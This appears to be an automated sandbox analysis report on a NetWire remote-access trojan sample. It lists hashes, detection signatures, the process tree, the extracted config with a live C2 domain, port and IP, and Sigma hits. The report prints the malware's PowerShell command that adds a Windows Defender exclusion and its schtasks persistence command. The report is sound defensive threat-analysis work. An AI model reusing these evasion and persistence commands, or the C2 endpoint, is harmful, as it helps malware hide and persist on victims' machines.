Windows Analysis Report g94e4BgSRN.exe

Overview

General Information

Sample Name: g94e4BgSRN.exe
Analysis ID: 553285
MD5: d058c6416284f291d6bc7e183293da1f
SHA1: 9fe97ad0c11997b7c0ca5a43aff43cc8bdb915b6
SHA256: c47c4a57e7521c6886ca3764b32ad1e5d8669f2fbf6b127fe7a832f1f3b74ec5
Tags: exe, NetWire, RAT

Detection

NetWire
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected NetWire RAT
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Contains functionality to steal Chrome passwords or cookies
Sigma detected: Powershell Defender Exclusion
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • g94e4BgSRN.exe (PID: 6384 cmdline: "C:\Users\user\Desktop\g94e4BgSRN.exe" MD5: D058C6416284F291D6BC7E183293DA1F)
    • powershell.exe (PID: 6780 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6796 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SiEKNQVnm" /XML "C:\Users\user\AppData\Local\Temp\tmp2A91.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • g94e4BgSRN.exe (PID: 6976 cmdline: C:\Users\user\Desktop\g94e4BgSRN.exe MD5: D058C6416284F291D6BC7E183293DA1F)
  • cleanup

Malware Configuration

Threatname: NetWire

{"C2 list": ["podzeye.duckdns.org:6688"], "Password": "Password", "Host ID": "HostId-%Rand%", "Mutex": "-", "Install Path": "-", "Startup Name": "-", "ActiveX Key": "-", "KeyLog Directory": "-"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.286467177.00000000026AB000.00000004.00000001.sdmp | JoeSecurity_NetWire_1 | Yara detected NetWire RAT | Joe Security |
00000009.00000000.282165749.0000000000400000.00000040.00000001.sdmp | JoeSecurity_NetWire_1 | Yara detected NetWire RAT | Joe Security |
00000009.00000000.280983052.0000000000400000.00000040.00000001.sdmp | JoeSecurity_NetWire_1 | Yara detected NetWire RAT | Joe Security |
00000009.00000000.281635680.0000000000400000.00000040.00000001.sdmp | JoeSecurity_NetWire_1 | Yara detected NetWire RAT | Joe Security |
00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp | JoeSecurity_NetWire_1 | Yara detected NetWire RAT | Joe Security |
(5 of 9 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
9.0.g94e4BgSRN.exe.400000.10.raw.unpack | JoeSecurity_NetWire_1 | Yara detected NetWire RAT | Joe Security |
9.0.g94e4BgSRN.exe.400000.16.unpack | JoeSecurity_NetWire_1 | Yara detected NetWire RAT | Joe Security |
9.0.g94e4BgSRN.exe.400000.12.unpack | JoeSecurity_NetWire_1 | Yara detected NetWire RAT | Joe Security |
9.0.g94e4BgSRN.exe.400000.4.unpack | JoeSecurity_NetWire_1 | Yara detected NetWire RAT | Joe Security |
9.0.g94e4BgSRN.exe.400000.16.raw.unpack | JoeSecurity_NetWire_1 | Yara detected NetWire RAT | Joe Security |
(5 of 15 entries shown)

Sigma Overview

System Summary:

Sigma detected: Suspicius Add Task From User AppData Temp
Source: Process started | Author: frack113 | Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SiEKNQVnm" /XML "C:\Users\user\AppData\Local\Temp\tmp2A91.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SiEKNQVnm" /XML "C:\Users\user\AppData\Local\Temp\tmp2A91.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\g94e4BgSRN.exe" , ParentImage: C:\Users\user\Desktop\g94e4BgSRN.exe, ParentProcessId: 6384, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SiEKNQVnm" /XML "C:\Users\user\AppData\Local\Temp\tmp2A91.tmp, ProcessId: 6796
Sigma detected: Powershell Defender Exclusion
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\g94e4BgSRN.exe" , ParentImage: C:\Users\user\Desktop\g94e4BgSRN.exe, ParentProcessId: 6384, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe, ProcessId: 6780
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\g94e4BgSRN.exe" , ParentImage: C:\Users\user\Desktop\g94e4BgSRN.exe, ParentProcessId: 6384, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe, ProcessId: 6780
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132866781239094432.6780.DefaultAppDomain.powershell

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 9.0.g94e4BgSRN.exe.400000.14.unpack | Malware Configuration Extractor: NetWire {"C2 list": ["podzeye.duckdns.org:6688"], "Password": "Password", "Host ID": "HostId-%Rand%", "Mutex": "-", "Install Path": "-", "Startup Name": "-", "ActiveX Key": "-", "KeyLog Directory": "-"}
Multi AV Scanner detection for submitted file
Source: g94e4BgSRN.exe | Virustotal: Detection: 49%
Source: g94e4BgSRN.exe | ReversingLabs: Detection: 62%
Multi AV Scanner detection for domain / URL
Source: podzeye.duckdns.org | Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\SiEKNQVnm.exe | ReversingLabs: Detection: 62%
Source: 9.0.g94e4BgSRN.exe.400000.14.unpack | Avira: Label: TR/Spy.Gen
Source: 9.0.g94e4BgSRN.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen
Source: 9.0.g94e4BgSRN.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen
Source: 9.0.g94e4BgSRN.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen
Source: 9.0.g94e4BgSRN.exe.400000.18.unpack | Avira: Label: TR/Spy.Gen
Source: 0.2.g94e4BgSRN.exe.3873c18.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 9.0.g94e4BgSRN.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen
Source: 9.0.g94e4BgSRN.exe.400000.16.unpack | Avira: Label: TR/Spy.Gen
Source: 9.0.g94e4BgSRN.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen
Source: 9.2.g94e4BgSRN.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen
Source: 0.2.g94e4BgSRN.exe.389be38.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: g94e4BgSRN.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: g94e4BgSRN.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\hXbuxbBIVw\src\obj\Debug\SoapInteg.pdb source: g94e4BgSRN.exe, SiEKNQVnm.exe.0.dr

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: podzeye.duckdns.org:6688
Uses dynamic DNS services
Source: unknown | DNS query: name: podzeye.duckdns.org
Source: Joe Sandbox View | ASN Name: ASGHOSTNETDE
Source: Joe Sandbox View | IP Address: 109.205.178.244
Source: global traffic | TCP traffic: 192.168.2.5:49758 -> 109.205.178.244:6688
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: g94e4BgSRN.exe, 00000000.00000002.286586670.0000000002762000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: g94e4BgSRN.exe, 00000000.00000003.250994241.00000000057FB000.00000004.00000001.sdmp | String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: g94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249404999.00000000057FD000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.250994241.00000000057FB000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249294569.00000000057FE000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249210789.000000000582D000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249251425.000000000582D000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249341645.00000000057FD000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249888666.00000000057F4000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com
Source: g94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comTC
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: g94e4BgSRN.exe, 00000000.00000003.249228910.00000000057FE000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.como.
Source: g94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249251425.000000000582D000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.como.)K
Source: g94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.como.2K-
Source: g94e4BgSRN.exe, 00000000.00000003.285409277.00000000057F0000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289129880.00000000057F0000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: g94e4BgSRN.exe, 00000000.00000003.285409277.00000000057F0000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289129880.00000000057F0000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.coma
Source: g94e4BgSRN.exe, 00000000.00000003.285409277.00000000057F0000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289129880.00000000057F0000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comceTFp
Source: g94e4BgSRN.exe, 00000000.00000003.251756053.00000000057F4000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.come
Source: g94e4BgSRN.exe, 00000000.00000003.246496422.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.246436621.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.246372251.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: g94e4BgSRN.exe, 00000000.00000003.246496422.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.246471898.000000000580B000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comn
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: g94e4BgSRN.exe, 00000000.00000003.248047122.00000000057FD000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn#
Source: g94e4BgSRN.exe, 00000000.00000003.248047122.00000000057FD000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn)
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/0
Source: g94e4BgSRN.exe, 00000000.00000003.250994241.00000000057FB000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0n
Source: g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0n1
Source: g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/f
Source: g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/k
Source: g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/n-u
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: g94e4BgSRN.exe, 00000000.00000003.247402628.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.247429610.000000000580B000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comlar?
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: g94e4BgSRN.exe | String found in binary or memory: http://www.yandex.com
Source: g94e4BgSRN.exe, 00000000.00000002.286467177.00000000026AB000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.287524308.0000000003873000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000009.00000000.282165749.0000000000400000.00000040.00000001.sdmp, g94e4BgSRN.exe, 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, g94e4BgSRN.exe, 00000009.00000000.276611463.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.yandex.comsocks=
Source: g94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249133388.000000000582D000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249210789.000000000582D000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249251425.000000000582D000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown | DNS traffic detected: queries for: podzeye.duckdns.org
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_00405FBE recv

System Summary:

Source: g94e4BgSRN.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 0_2_00B6EA90
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 0_2_00B6EA80
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 0_2_00B6CAD4
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 0_2_0027A7A0
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_00403047
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_0041D049
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_00419463
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_00415079
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_00420420
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_004208C0
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_004034D3
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_00414976
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_00402E68
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_00416619
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_0040AEC6
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_00402AFC
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_00415ABF
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_00420F40
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_0041FF50
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_0040A728
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_00BDA7A0
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: String function: 004081AA appears 110 times
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: String function: 0041F724 appears 31 times
Source: g94e4BgSRN.exe, 00000000.00000002.289787258.0000000008D40000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameUI.dllF vs g94e4BgSRN.exe
Source: g94e4BgSRN.exe, 00000000.00000002.285818219.000000000034D000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameSoapInteg.exeF vs g94e4BgSRN.exe
Source: g94e4BgSRN.exe, 00000000.00000002.286758625.0000000003631000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUI.dllF vs g94e4BgSRN.exe
Source: g94e4BgSRN.exe, 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename vs g94e4BgSRN.exe
Source: g94e4BgSRN.exe, 00000009.00000000.273523532.0000000000CAD000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameSoapInteg.exeF vs g94e4BgSRN.exe
Source: g94e4BgSRN.exe | Binary or memory string: OriginalFilenameSoapInteg.exeF vs g94e4BgSRN.exe
Source: g94e4BgSRN.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: SiEKNQVnm.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: g94e4BgSRN.exe | Virustotal: Detection: 49%
Source: g94e4BgSRN.exe | ReversingLabs: Detection: 62%
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | File read: C:\Users\user\Desktop\g94e4BgSRN.exe
Source: g94e4BgSRN.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\g94e4BgSRN.exe "C:\Users\user\Desktop\g94e4BgSRN.exe"
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SiEKNQVnm" /XML "C:\Users\user\AppData\Local\Temp\tmp2A91.tmp
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Process created: C:\Users\user\Desktop\g94e4BgSRN.exe C:\Users\user\Desktop\g94e4BgSRN.exe
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SiEKNQVnm" /XML "C:\Users\user\AppData\Local\Temp\tmp2A91.tmp
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Process created: C:\Users\user\Desktop\g94e4BgSRN.exe C:\Users\user\Desktop\g94e4BgSRN.exe
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | File created: C:\Users\user\AppData\Roaming\SiEKNQVnm.exe
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | File created: C:\Users\user\AppData\Local\Temp\tmp2A91.tmp
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/8@1/1
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Mutant created: \Sessions\1\BaseNamedObjects\-
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_01
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Mutant created: \Sessions\1\BaseNamedObjects\LHYnnrIIXQJlqGseSnyzoQyOK
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_01
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: g94e4BgSRN.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: g94e4BgSRN.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: g94e4BgSRN.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\hXbuxbBIVw\src\obj\Debug\SoapInteg.pdb source: g94e4BgSRN.exe, SiEKNQVnm.exe.0.dr

                      Data Obfuscation:

                      barindex
.NET source code contains potential unpacker
Source: g94e4BgSRN.exe, CsDO.CodeGenerator/frmMain.cs | .Net Code: CALLCONV System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: SiEKNQVnm.exe.0.dr, CsDO.CodeGenerator/frmMain.cs | .Net Code: CALLCONV System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_0040DCE9 push ecx; mov dword ptr [esp], 00423976h | 9_2_0040DD9F
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_0040DCE9 push ebp; mov dword ptr [esp], 0042398Ah | 9_2_0040DDD9
